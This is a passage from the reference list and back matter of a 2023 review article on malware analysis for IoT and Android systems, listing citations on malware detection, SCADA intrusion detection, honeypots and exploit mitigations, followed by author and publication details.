  147. Németh ZL. Modern binary attacks and defences in the windows environment—fighting against microsoft EMET in seven rounds. In: 2015 IEEE 13th International Symposium on Intelligent Systems and Informatics (SISY), pp. 275–280. 2015.

  148. Cohen M. Scanning memory with Yara. Digit Investig. 2017;20:34–43.

    Google Scholar 

  149. Sarantinos N, Benzaïd C, Arabiat O, Al-Nemrat A. Forensic malware analysis: the value of fuzzy hashing algorithms in identifying similarities. IEEE Trustcom/BigDataSE/ISPA. 2016;2016:1782–7.

    Google Scholar 

  150. Gandotra E, Bansal D, Sofat S. Malware analysis and classification: a survey. J Inf Secur. 2014;2014.

  151. Bidoki SM, Jalili S, Tajoddin A. PbMMD: a novel policy based multi-process malware detection. Eng Appl Artif Intell. 2017;60:57–70.

    Google Scholar 

  152. Ndatinya V, Xiao Z, Manepalli VR, Meng K, Xiao Y. Network forensics analysis using Wireshark. Int J Secur Netw. 2015;10(2):91–106.

    Google Scholar 

  153. Hoque N, Bhuyan MH, Baishya RC, Bhattacharyya DK, Kalita JK. Network attacks: taxonomy, tools and systems. J Netw Comput Appl. 2014;40:307–24.

    Google Scholar 

  154. Eilam E. Reversing: secrets of reverse engineering. John Wiley & Sons. 2011.

  155. Gibert Llauradó D, Mateu Piñol C, Planes Cid J. The rise of machine learning for detection and classification of malware: research developments, trends and challenge. J Netw Comput Appl. 2020;153:102526.

    Google Scholar 

  156. Rathnayaka C, Jamdagni A. An efficient approach for advanced malware analysis using memory forensic technique. IEEE Trustcom/BigDataSE/ICESS. 2017;2017:1145–50.

    Google Scholar 

  157. Kara I. A basic malware analysis method. Comput Fraud Secur. 2019;2019(6):11–9.

    Google Scholar 

  158. Kävrestad J. Memory analysis tools. In: Fundamentals of Digital Forensics, Springer, pp. 217–224. 2020.

  159. Pirscoveanu RS, Hansen SS, Larsen TMT, Stevanovic M, Pedersen JM, Czech A. Analysis of malware behavior: type classification using machine learning. In: 2015 International conference on cyber situational awareness, data analytics and assessment (CyberSA), pp. 1–7. 2015.

  160. Aslan Ö, Samet R. Investigation of possibilities to detect malware using existing tools. In: 2017 IEEE/ACS 14th International Conference on Computer Systems and Applications (AICCSA), pp. 1277–1284. 2017.

  161. Mirza QKA, Awan I, Younas M. CloudIntell: an intelligent malware detection system. Fut Gener Comput Syst. 2018;86:1042–53.

    Google Scholar 

  162. Lin W, Lee D. Traceback attacks in cloud - Pebbletrace botnet. In: Proceedings - 32nd IEEE International Conference on Distributed Computing Systems Workshops, ICDCSW 2012, pp. 417–426. 2012. https://doi.org/10.1109/ICDCSW.2012.61.

  163. Beuhring A, Salous K. Beyond blacklisting: cyberdefense in the era of advanced persistent threats. IEEE Secur Priv. 2014;12(5):90–3.

    Google Scholar 

  164. Jiang J, Yasakethu L. Anomaly detection via one class svm for protection of scada systems. Int Conf Cyber Enabled Distrib Comput Knowl Discov. 2013;2013:82–8.

    Google Scholar 

  165. Almalawi A, Yu X, Tari Z, Fahad A, Khalil I. An unsupervised anomaly-based detection approach for integrity attacks on SCADA systems. Comput Secur. 2014;46:94–110.

    Google Scholar 

  166. O’Kane P, Sezer S, McLaughlin K, Im EG. SVM training phase reduction using dataset feature filtering for malware detection. IEEE Trans Inf Forens Secur. 2013;8(3):500–9.

    Google Scholar 

  167. Torrisi NM, Vuković O, Dán G, Hagdahl S. Peekaboo: a gray hole attack on encrypted SCADA communication using traffic analysis. IEEE Int Confe Smart Grid Commu (SmartGridComm). 2014;2014:902–7.

    Google Scholar 

  168. Nader P, Honeine P, Beauseroy P. ${l_p}$-norms in one-class classification for intrusion detection in SCADA systems. IEEE Trans Ind Inform. 2014;10(4):2308–17.

    Google Scholar 

  169. Simmhan Y, et al. Cloud-based software platform for big data analytics in smart grids. Comput Sci Eng. 2013;15(4):38–47.

    Google Scholar 

  170. Markel Z, Bilzor M. Building a machine learning classifier for malware detection. In: 2014 second workshop on anti-malware testing research (WATeR), pp. 1–4. 2014.

  171. Nagano Y, Uda R. Static analysis with paragraph vector for malware detection. In: Proceedings of the 11th International Conference on Ubiquitous Information Management and Communication, pp. 1–7. 2017.

  172. Huda S, et al. Defending unknown attacks on cyber-physical systems by semi-supervised approach and available unlabeled data. Inf Sci (Ny). 2017;379:211–28.

    Google Scholar 

  173. Mohaisen A, Alrawi O, Mohaisen M. AMAL: high-fidelity, behavior-based automated malware analysis and classification. Comput Secur. 2015;52:251–66.

    Google Scholar 

  174. Mira F, Brown A, Huang W. Novel malware detection methods by using LCS and LCSS. In: 2016 22nd International Conference on Automation and Computing (ICAC), pp. 554–559. 2016.

  175. Shabtai A, Moskovitch R, Elovici Y, Glezer C. Detection of malicious code by applying machine learning classifiers on static features: a state-of-the-art survey. Inf Secur Tech Rep. 2009;14(1):16–29.

    Google Scholar 

  176. Damodaran A, Di Troia F, Visaggio CA, Austin TH, Stamp M. A comparison of static, dynamic, and hybrid analysis for malware detection. J Comput Virol Hacking Tech. 2017;13(1):1–12.

    Google Scholar 

  177. Barabosch T, Gerhards-Padilla E. Host-based code injection attacks: a popular technique used by malware. In: 2014 9th International Conference on Malicious and Unwanted Software: The Americas (MALWARE), pp. 8–17. 2014.

  178. Snow KZ, Rogowski R, Werner J, Koo H, Monrose F, Polychronakis M. Return to the zombie gadgets: undermining destructive code reads via code inference attacks. IEEE Symp Secur Priv (SP). 2016;2016:954–68.

    Google Scholar 

  179. Lee B, Lu L, Wang T, Kim T, Lee W. From zygote to morula: fortifying weakened aslr on android. IEEE Symp Secur Priv. 2014;2014:424–39.

    Google Scholar 

  180. Gisbert HM, Ripoll I. On the effectiveness of nx, ssp, renewssp, and aslr against stack buffer overflows. In: 2014 IEEE 13th International Symposium on Network Computing and Applications, pp. 145–152. 2014.

  181. Rohlf C, Ivnitskiy Y. The security challenges of client-side just-in-time engines. IEEE Secur Priv. 2012;10(2):84–6.

    Google Scholar 

  182. Van Der Veen V, et al. A tough call: mitigating advanced code-reuse attacks at the binary level. IEEE Symp Secur Priv (SP). 2016;2016:934–53.

    Google Scholar 

  183. Xiao X, Yan R, Ye R, Li Q, Peng S, Jiang Y. Detection and prevention of code injection attacks on HTML5-based apps. Third Int Conf Adv Cloud Big Data. 2015;2015:254–61.

    Google Scholar 

  184. Brookes S, Osterloh M, Denz R, Taylor S. The KPLT: the kernel as a shared object. In: MILCOM 2015–2015 IEEE Military Communications Conference, pp. 954–959. 2015.

  185. Chen P, Wu R, Mao B. JITSafe: a framework against Just-in-time spraying attacks. IET Inf Secur. 2013;7(4):283–92.

    Google Scholar 

  186. Kil C, Jun J, Bookholt C, Xu J, Ning P. Address space layout permutation (ASLP): towards fine-grained randomization of commodity software. In: 2006 22nd Annual Computer Security Applications Conference (ACSAC’06), pp. 339–348. 2006.

  187. Hoekstra M, Lal R, Pappachan P, Phegade V, Del Cuvillo J. Using innovative instructions to create trustworthy software solutions. HASP@ ISCA. 2013;11(10): 2487726–2488370.

  188. De la Hoz E, Cochrane G, Moreira-Lemus JM, Paez-Reyes R, Marsa-Maestre I, Alarcos B. Detecting and defeating advanced man-in-the-middle attacks against TLS. In: 2014 6th International Conference On Cyber Conflict (CyCon 2014), pp. 209–221. 2014.

  189. Buhov D, Huber M, Merzdovnik G, Weippl E. Pin it! Improving Android network security at runtime. In: 2016 IFIP Networking Conference (IFIP Networking) and Workshops, 2016, pp. 297–305.

  190. Merzdovnik G, Buhov D, Voyiatzis AG, Weippl ER (2016) Notary-assisted certificate pinning for improved security of android apps. In: 2016 11th International Conference on Availability, Reliability and Security (ARES), pp. 365–371. 2016.

  191. Jiang S, Li W, Li H, Zhang Y, Zhang H, Liu Y. Fault localization for null pointer exception based on stack trace and program slicing. In: 2012 12th International Conference on Quality Software, pp. 9–12. 2012.

  192. Romano D, Di Penta M, Antoniol G. An approach for search based testing of null pointer exceptions. In: 2011 Fourth IEEE International Conference on Software Testing, Verification and Validation, pp. 160–169. 2011.

  193. Ma S, Jiao M, Zhang S, Zhao W, Wang DW. Practical null pointer dereference detection via value-dependence analysis. IEEE Int Symp Softw Reliab Eng Worksh (ISSREW). 2015;2015:70–7.

    Google Scholar 

  194. Hsu F-H, Tso C-K, Yeh Y-C, Wang W-J, Chen L-H. Browserguard: a behavior-based solution to drive-by-download attacks. IEEE J Sel areas Commun. 2011;29(7):1461–8.

    Google Scholar 

  195. Cheng H, Yong F, Liang L, Wang L-R. A static detection model of malicious PDF documents based on naive Bayesian classifier technology. Int Conf Wavelet Act Media Technol Inform Proces (ICWAMTIP). 2012;2012:29–32.

    Google Scholar 

  196. Al-Taharwa IA, Lee H-M, Jeng AB, Ho C-S, Wu K-P, Chen S-M. Drive-by disclosure: a large-scale detector of drive-by downloads based on latent behavior prediction. In: 2015 IEEE Trustcom/BigDataSE/ISPA, vol. 1, pp. 334–343. 2015.

  197. Welch I, Gao X, Komisarczuk P. Detecting heap-spray attacks in drive-by downloads: Giving attackers a hand. In: 38th Annual IEEE Conference on Local Computer Networks, pp. 300–303. 2013.

  198. Malipatlolla S, Feller T, Shoufan A, Arul T, Huss SA. A novel architecture for a secure update of cryptographic engines on trusted platform module. Int Conf Field-Program Technol. 2011;2011:1–6.

    Google Scholar 

  199. Maybaum M, Toelle J. ARMing the trusted platform module pro-active system integrity monitoring focussing on peer system notification. In: MILCOM 2015–2015 IEEE Military Communications Conference, pp. 1584–1589. 2015.

  200. Razmi MAY, Hashim H. Forming virtualized test bed for Trusted Platform Module in Windows environment. IEEE Int Conf Comput Appl Ind Electron (ICCAIE). 2011;2011:645–50.

    Google Scholar 

  201. Yu Z, Wang Q, Zhang W, Dai H. A cloud certificate authority architecture for virtual machines with trusted platform module. In: 2015 IEEE 17th International Conference on High Performance Computing and Communications, 2015 IEEE 7th International Symposium on Cyberspace Safety and Security, and 2015 IEEE 12th International Conference on Embedded Software and Systems, pp. 1377–1380. 2015.

  202. Kim D, Jeon Y, Kim J. A method based on platform integrity verification for activating a mobile trusted module. Int Conf Inform Commun Technol Converg (ICTC). 2015;2015:1174–6.

    Google Scholar 

  203. Zhang F, Leach K, Sun K, Stavrou A. Spectre: A dependable introspection framework via system management mode. In: 2013 43rd Annual IEEE/IFIP international conference on dependable systems and networks (DSN), pp. 1–12. 2013.

  204. Messaoud BID, Guennoun K, Wahbi M, Sadik M. Advanced persistent threat: new analysis driven by life cycle phases and their challenges. Int Conf Adv Commun Syst Inform Secur (ACOSIS). 2016;2016:1–6.

    Google Scholar 

  205. Mahboob A, Zubairi JA. “Securing SCADA systems with open source software. High Cap Opt Netw Emerg Enabl Technol. 2013;2013:193–8.

    Google Scholar 

  206. Jain P, Tripathi P. SCADA security: a review and enhancement for DNP3 based systems. CSI Trans ICT. 2013;1(4):301–8.

    Google Scholar 

  207. Yang Y, McLaughlin K, Littler T, Sezer S, Wang HF. Rule-based intrusion detection system for SCADA networks. 2013.

  208. MacDermott Á, Shi Q, Merabti M, Kifayat K. Intrusion detection for critical infrastructure protection. 2012.

  209. Yang Y, McLaughlin K, Sezer S, Yuan YB, Huang W. Stateful intrusion detection for IEC 60870-5-104 SCADA security. In: 2014 IEEE PES General Meeting| Conference & Exposition, pp. 1–5. 2014.

  210. Oman P, Phillips M. Intrusion detection and event monitoring in SCADA networks. In: International Conference on Critical Infrastructure Protection, pp. 161–173. 2007.

  211. Fovino IN, Coletta A, Carcano A, Masera M. Critical state-based filtering system for securing SCADA network protocols. IEEE Trans Ind Electron. 2011;59(10):3943–50.

    Google Scholar 

  212. Kirsch J, Goose S, Amir Y, Wei D, Skare P. Survivable SCADA via intrusion-tolerant replication. IEEE Trans Smart Grid. 2013;5(1):60–70.

    Google Scholar 

  213. Carcano A, Coletta A, Guglielmi M, Masera M, Fovino IN, Trombetta A. A multidimensional critical state analysis for detecting intrusions in SCADA systems. IEEE Trans Ind Inform. 2011;7(2):179–86.

    Google Scholar 

  214. Winn M, Rice M, Dunlap S, Lopez J, Mullins B. Constructing cost-effective and targetable industrial control system honeypots for production networks. Int J Crit Infrastruct Prot. 2015;10:47–58.

    Google Scholar 

  215. Baecher P, Koetter M, Holz T, Dornseif M, Freiling F. The nepenthes platform: an efficient approach to collect malware. In: International Workshop on Recent Advances in Intrusion Detection, pp. 165–184. 2006.

  216. Disso JP, Jones K, Bailey S. A plausible solution to SCADA security honeypot systems. In: 2013 Eighth International Conference on Broadband and Wireless Computing, Communication and Applications, pp. 443–448. 2013.

  217. Pham V-H, Dacier M. Honeypot trace forensics: the observation viewpoint matters. Futur Gener Comput Syst. 2011;27(5):539–46.

    Google Scholar 

  218. Brand M, Valli C, Woodward A. A threat to cyber resilience: a malware rebirthing botnet. 2011.

  219. Goldenberg J, Shavitt Y, Shir E, Solomon S. Distributive immunization of networks against viruses using the ‘honey-pot’architecture. Nat Phys. 2005;1(3):184–8.

    Google Scholar 

  220. Erol-Kantarci M, Mouftah HT. Smart grid forensic science: applications, challenges, and open issues. IEEE Commun Mag. 2013;51(1):68–74.

    Google Scholar 

  221. Amnesty International Security Lab. Mobile Verification Toolkit. 2021. https://docs.mvt.re/en/latest/ (Accessed Aug. 12, 2021).

Download references

Author information

Authors and Affiliations

  1. STQC, Ministry of Electronics and Information Technology, Delhi, India

    Chandra Shekhar Yadav

  2. Department of Computer Science and Engineering, Chaitanya Bharathi Institute of Technology, Hyderabad, India

    Sangeeta Gupta

Authors
  1. Chandra Shekhar Yadav
    View author publications

    You can also search for this author in PubMed Google Scholar

  2. Sangeeta Gupta
    View author publications

    You can also search for this author in PubMed Google Scholar

Corresponding author

Correspondence to Chandra Shekhar Yadav.

Ethics declarations

Conflict of Interest

Author declares that they has no conflict of interest.

Ethical Approval

This article does not contain any studies with human participants performed by any of the authors.

Additional information

Publisher's Note

Springer Nature remains neutral with regard to jurisdictional claims in published maps and institutional affiliations.

Supplementary Information

Below is the link to the electronic supplementary material.

Supplementary file1 (DOCX 696 kb)

Rights and permissions

Springer Nature or its licensor (e.g. a society or other partner) holds exclusive rights to this article under a publishing agreement with the author(s) or other rightsholder(s); author self-archiving of the accepted manuscript version of this article is solely governed by the terms of such publishing agreement and applicable law.

Reprints and permissions

About this article

Check for updates. Verify currency and authenticity via CrossMark

Cite this article

Yadav, C.S., Gupta, S. A Review on Malware Analysis for IoT and Android System. SN COMPUT. SCI. 4, 118 (2023). https://doi.org/10.1007/s42979-022-01543-w

Download citation

  • Received:

  • Accepted:

  • Published:

  • DOI: https://doi.org/10.1007/s42979-022-01543-w

Keywords